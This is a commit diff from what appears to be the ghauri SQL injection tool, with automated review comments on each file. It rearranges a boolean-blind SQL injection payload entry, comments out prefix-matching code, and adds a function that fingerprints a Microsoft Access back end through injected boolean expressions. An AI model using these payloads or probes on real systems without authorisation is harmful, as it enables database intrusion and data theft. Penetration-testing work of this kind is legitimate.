  • added fingerprint backend DBMS in case of MS ACCESS boolean-based injection.. improved code quality..

  • r0oth3x49 committed 1 year ago
    2b97bf0a
    1 parent 095b2abf
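--- a/ghauri/common/payloads.py
+++ b/ghauri/common/payloads.py
@@ -191,17 +191,6 @@
 "dbms": "",
 },
 {
-"payload": "(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT 09567 UNION SELECT 08652) END))",
-"comments": [
-{"pref": "", "suf": ""},
-{"pref": "NULL AND 09854=", "suf": "-- wXyW"},
-{"pref": "NULL OR 06387=", "suf": "-- wXyW"},
-],
-"title": "Boolean-based blind - Parameter replace (original value)",
-"vector": "(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT 09567 UNION SELECT 08652) END))",
-"dbms": "",
-},
-{
 "payload": "OR NOT [RANDNUM]=[RANDNUM]",
 "comments": [
 {"pref": " ", "suf": ""},
@@ -249,6 +238,17 @@
 ],
 "title": "OR boolean-based blind - WHERE or HAVING clause",
 "vector": "OR [INFERENCE]",
+"dbms": "",
+},
+{
+"payload": "(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT 09567 UNION SELECT 08652) END))",
+"comments": [
+{"pref": "", "suf": ""},
+# {"pref": "NULL AND 09854=", "suf": "-- wXyW"},
+# {"pref": "NULL OR 06387=", "suf": "-- wXyW"},
+],
+"title": "Boolean-based blind - Parameter replace (original value)",
+"vector": "(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT 09567 UNION SELECT 08652) END))",
 "dbms": "",
 },
 {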
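Review bot: The two prefix/suffix variants at new lines 247–248 are left as commented-out dict literals inside the `comments` list instead of being removed, so the list now carries dead configuration with no explanation; if they are disabled deliberately, a one-line `# disabled: <reason>` above them (or their deletion) would say so. The same pattern of leaving commented-out code in place appears in utils.py at new lines 1315–1320 and tests.py at new lines 1565–1566 in this commit. The entry is also moved from the middle of the list to its tail; if any consumer selects from this list by position (utils.py in this commit indexes `payloads[-1]`, though it is not certain that list is derived from this one), a comment such as `# keep last: selected by position` above the entry would prevent a silent regression when a new entry is appended.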
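--- a/ghauri/common/utils.py
+++ b/ghauri/common/utils.py
@@ -372,11 +372,11 @@
 re.sub(r"[^a-zA-Z0-9\.\s]+", " ", response_01[j1:j2]).lstrip().rstrip(),
 )
 if len(new) >= 2 and len(old) >= 2 and len(new) <= 20 and len(old) <= 20:
-# logger.debug(
-# "{:7} response[{}:{}] --> response_01[{}:{}] {!r:>8} --> {!r}".format(
-# tag, i1, i2, j1, j2, new, old
-# )
-# )
+logger.debug(
+"{:7} string[{}:{}] --> not_string[{}:{}] {!r:>8} --> {!r}".format(
+tag, i1, i2, j1, j2, new, old
+)
+)
 _temp.append(
 {
 "string": f"{response[i1:i2]}",
@@ -1312,23 +1312,23 @@
 # f" both prefix and suffix are found for injection.. '{prefix}', '{suffix}'"
 # )
 # logger.debug("checking payloads for provided prefix and suffix..")
-for entry in payloads:
-_pref = entry.prefix
-prefix = urldecode(prefix)
-if _pref and prefix and prefix[0] == _pref[0]:
-_temp.append(entry)
-if not _temp:
-payload = payloads[-1].raw
-if prefix and prefix[-1] in [")", "'", '"']:
-prefix += " "
-_temp = [
-Payload(
-prefix=prefix,
-suffix=suffix,
-string=f"{prefix}{payload}{suffix}",
-raw=payload,
-)
-]
+# for entry in payloads:
+# _pref = entry.prefix
+# prefix = urldecode(prefix)
+# if _pref and prefix and prefix[0] == _pref[0]:
+# _temp.append(entry)
+# if not _temp:
+payload = payloads[-1].raw
+if prefix and prefix[-1] in [")", "'", '"']:
+prefix += " "
+_temp = [
+Payload(
+prefix=prefix,
+suffix=suffix,
+string=f"{prefix}{payload}{suffix}",
+raw=payload,
+)
+]
 return _temp
 
 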
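Review bot: With the matching loop and the `if not _temp:` guard commented out (new lines 1315–1320), `payload = payloads[-1].raw` now runs unconditionally, so an empty `payloads` raises IndexError where the old code would have returned `_temp` unchanged, and `prefix = urldecode(prefix)` no longer runs, so a URL-encoded prefix is concatenated as-is into `string`. If the prefix matching is intentionally dropped, delete the commented-out lines and guard the index explicitly, e.g. `if not payloads: return _temp` placed before the `payload = ...` line (`_temp` is presumably initialised earlier in the function, which starts outside the hunk); if the decode is still wanted, keep `prefix = urldecode(prefix)` as a live line. In the first hunk the re-enabled debug message labels the slices `string[...]` / `not_string[...]` while the values sliced are `response` and `response_01`, so the log would be easier to correlate if the labels matched the variable names.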
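--- a/ghauri/core/tests.py
+++ b/ghauri/core/tests.py
@@ -254,6 +254,8 @@
 response = inj.check_mssql()
 if backend == "PostgreSQL":
 response = inj.check_postgre()
+if backend == "Microsoft Access":
+response = inj.check_access()
 if not response:
 response = inj.check_oracle()
 if not response:
@@ -709,6 +711,8 @@
 response_dbms = inj.check_mssql(heuristic_backend_check=True)
 if not response_dbms:
 response_dbms = inj.check_postgre(heuristic_backend_check=True)
+if not response_dbms:
+response_dbms = inj.check_access(heuristic_backend_check=True)
 if response_dbms:
 backend = response_dbms
 if not response_dbms:
@@ -1558,8 +1562,8 @@
 title = entry.get("title")
 vector = entry.get("vector")
 backend = entry.get("backend")
-if not possible_dbms:
-possible_dbms = backend
+# if not possible_dbms:
+# possible_dbms = backend
 if payload_type == "boolean-based blind":
 vectors.update({"boolean_vector": vector})
 logger.debug(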
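Review bot: The fallback `if not possible_dbms: possible_dbms = backend` is commented out at new lines 1565–1566 rather than removed, so `possible_dbms` is no longer populated from the matched entry's `backend` here while `backend = entry.get("backend")` on the line above is still computed; whether anything later in this function reads either value cannot be seen from the hunk, and the enclosing function starts and ends outside it. If the fallback is intentionally gone, delete the two lines and add a short comment in their place stating where `possible_dbms` is now expected to be set, so the next reader does not re-enable them; if `backend` is then unused, drop that assignment too. In the first hunk the new `if backend == "Microsoft Access":` follows the sibling checks' independent-`if` style, so the later `if not response:` fall-through to `check_oracle()` still applies to the Access path, which looks intended.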
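--- a/ghauri/dbms/fingerprint.py
+++ b/ghauri/dbms/fingerprint.py
@@ -213,6 +213,83 @@
 _temp = "MySQL"
 return _temp
 
+def check_access(self, heuristic_backend_check=False):
+_temp = ""
+if heuristic_backend_check:
+attack = self.check_boolean_expression(expression="VAL(CVAR(1))=1")
+attack01 = self.check_boolean_expression(
+expression=quote(
+"IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0",
+)
+)
+bool_retval = check_boolean_responses(
+self.base,
+attack,
+attack01,
+match_string=self.match_string,
+not_match_string=self.not_match_string,
+code=self.code,
+text_only=self.text_only,
+)
+result = bool_retval.vulnerable
+if result:
+is_ok = False
+if self._attacks:
+t0, f0 = self._attacks[0].status_code, self._attacks[-1].status_code
+t1, f1 = attack.status_code, attack01.status_code
+r0, r1 = self._attacks[0].redirected, attack.redirected
+is_ok = bool(t0 == t1 and f0 == f1 and r0 == r1)
+if is_ok:
+message = f"heuristic (extended) test shows that the back-end DBMS could be '{mc}Microsoft Access{nc}'"
+logger.notice(message)
+_temp = "Microsoft Access"
+else:
+logger.info(f"testing Microsoft Access")
+attack = self.check_boolean_expression(expression="VAL(CVAR(1))=1")
+bool_retval = check_boolean_responses(
+self.base,
+attack,
+self.attack01,
+match_string=self.match_string,
+not_match_string=self.not_match_string,
+code=self.code,
+text_only=self.text_only,
+)
+result = bool_retval.vulnerable
+ok = False
+if result:
+logger.info(f"confirming Microsoft Access")
+attack = self.check_boolean_expression(
+expression="IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0"
+)
+bool_retval = check_boolean_responses(
+self.base,
+attack,
+self.attack01,
+match_string=self.match_string,
+not_match_string=self.not_match_string,
+code=self.code,
+text_only=self.text_only,
+)
+result = bool_retval.vulnerable
+if not result:
+warnMsg = "the back-end DBMS is not Microsoft Access"
+logger.warning(warnMsg)
+ok = False
+return ""
+if result:
+ok = True
+else:
+warnMsg = "the back-end DBMS is not Microsoft Access"
+logger.warning(warnMsg)
+ok = False
+return ""
+if ok:
+logger.notice("the back-end DBMS is Microsoft Access")
+if ok:
+_temp = "Microsoft Access"
+return _temp
+
 def check_mssql(self, heuristic_backend_check=False):
 _temp = ""
 db_version = ""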
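Review bot: The new `check_access` has no docstring and carries two f-strings with no placeholders (`logger.info(f"testing Microsoft Access")` at new lines 247 and 261, ruff F541), and in the confirmation path the `ok` flag is set to False immediately before each `return ""` and then tested twice in a row, so it does no work. A docstring stating that the method returns `"Microsoft Access"` when both boolean probes report vulnerable and `""` otherwise, with `heuristic_backend_check` selecting the extended comparison of status codes and redirects against `self._attacks`, would match what the code shows. The heuristic branch wraps the IIF expression in `quote(...)` while the confirmation branch passes the same expression unquoted; if that difference is deliberate it deserves a comment, otherwise one of the two looks like an oversight. The non-heuristic branch can be flattened to guard clauses without changing its outcome, as below.

```python
        else:
            logger.info("testing Microsoft Access")
            attack = self.check_boolean_expression(expression="VAL(CVAR(1))=1")
            bool_retval = check_boolean_responses(
                # … unchanged: same arguments as the original call …
            )
            if not bool_retval.vulnerable:
                logger.warning("the back-end DBMS is not Microsoft Access")
                return ""
            logger.info("confirming Microsoft Access")
            attack = self.check_boolean_expression(
                expression="IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0"
            )
            bool_retval = check_boolean_responses(
                # … unchanged: same arguments as the original call …
            )
            if not bool_retval.vulnerable:
                logger.warning("the back-end DBMS is not Microsoft Access")
                return ""
            logger.notice("the back-end DBMS is Microsoft Access")
            _temp = "Microsoft Access"
        return _temp
```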